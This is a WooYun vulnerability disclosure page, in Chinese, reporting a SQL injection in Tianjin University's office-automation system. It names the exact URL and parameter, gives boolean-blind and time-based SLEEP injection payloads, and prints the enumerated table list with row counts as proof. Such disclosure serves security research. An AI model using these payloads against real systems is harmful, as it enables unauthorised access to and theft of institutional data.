当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130582

漏洞标题:天津大学办公网某处存在SQL注入漏洞泄漏大量数据信息

相关厂商:tju.edu.cn

漏洞作者: 路人甲

提交时间:2015-07-31 08:00

修复时间:2015-08-05 08:02

公开时间:2015-08-05 08:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-31: 细节已通知厂商并且等待厂商处理中
2015-08-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

漏洞地址:

http://e.tju.edu.cn/OA/tmsgReadLog.do?msgid=697269


---
Parameter: msgid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: msgid=697269 AND 3669=3669
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: msgid=697269 AND (SELECT * FROM (SELECT(SLEEP(5)))NpWH)
---

漏洞证明:

1.png


Database: app_manager
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| eweb_sys_log_visit | 21854313 |
| oa_message_readlog_bak | 3374138 |
| oa_message_oplog | 1327788 |
| oa_message_readlog | 845441 |
| oa_message_receiver_bak | 637957 |
| oa_message_bak | 482546 |
| oa_message_atta_bak | 472307 |
| oa_message_receiver | 212001 |
| oa_message_atta | 137866 |
| oa_message | 134623 |
| eweb_info_oplog | 53026 |
| eweb_info | 30924 |
| oa_workflow_user_task | 21613 |
| oa_workflow_log | 16591 |
| eweb_info_atta | 13852 |
| eweb_info_cnt | 12430 |
| oa_workflow_doc_form_approval | 8325 |
| oa_schfile_oplog | 4333 |
| oa_schfile_atta | 2864 |
| oa_schfile | 2848 |
| oa_workflow_doc_form_atta | 2121 |
| oa_workflow_doc_form | 2002 |
| eweb_sys_group_member | 1681 |
| oa_workflow_user_role | 1298 |
| oa_message_info | 774 |
| eweb_oa_task | 448 |
| oa_workflow_role | 407 |
| oa_message_info_atta | 329 |
| oa_workflow_doc_form_comment | 269 |
| eweb_info_privilege | 249 |
| eweb_oa_task_atta | 233 |
| eweb_info_dict_class | 170 |
| USERS | 92 |
| eweb_info_dict_system | 58 |
| GROUPS | 58 |
| COLLEGE | 57 |
| oa_dict_schfile_keycate | 46 |
| oa_workflow_status | 38 |
| oa_workflow_doc_form_favor | 26 |
| eweb_info_link | 22 |
| pbcatedt | 21 |
| pbcatfmt | 20 |
| oa_workflow_leave_type | 13 |
| eweb_info_dict_category | 12 |
| oa_dict_schfile_category | 12 |
| oa_dict_schfile_sendorg | 9 |
| oa_dict_class | 8 |
| oa_dict_schfile_audiences | 6 |
| oa_workflow | 6 |
| test | 5 |
| test1 | 5 |
| application_seal | 4 |
| exercise | 4 |
| eweb_sys_user | 2 |
| oa_workflow_receive_file_type | 2 |
| oa_workflow_report_file_seq | 2 |
| counter | 1 |
| eweb_sys_group | 1 |
| seal_atta | 1 |
| test_inno | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 914 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 271 |
| SESSION_VARIABLES | 271 |
| STATISTICS | 138 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128 |
| COLLATIONS | 127 |
| PARTITIONS | 97 |
| TABLES | 97 |
| KEY_COLUMN_USAGE | 92 |
| TABLE_CONSTRAINTS | 72 |
| CHARACTER_SETS | 36 |
| PROCESSLIST | 14 |
| PLUGINS | 10 |
| ENGINES | 8 |
| SCHEMA_PRIVILEGES | 4 |
| SCHEMATA | 2 |
| TABLE_PRIVILEGES | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-05 08:02

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无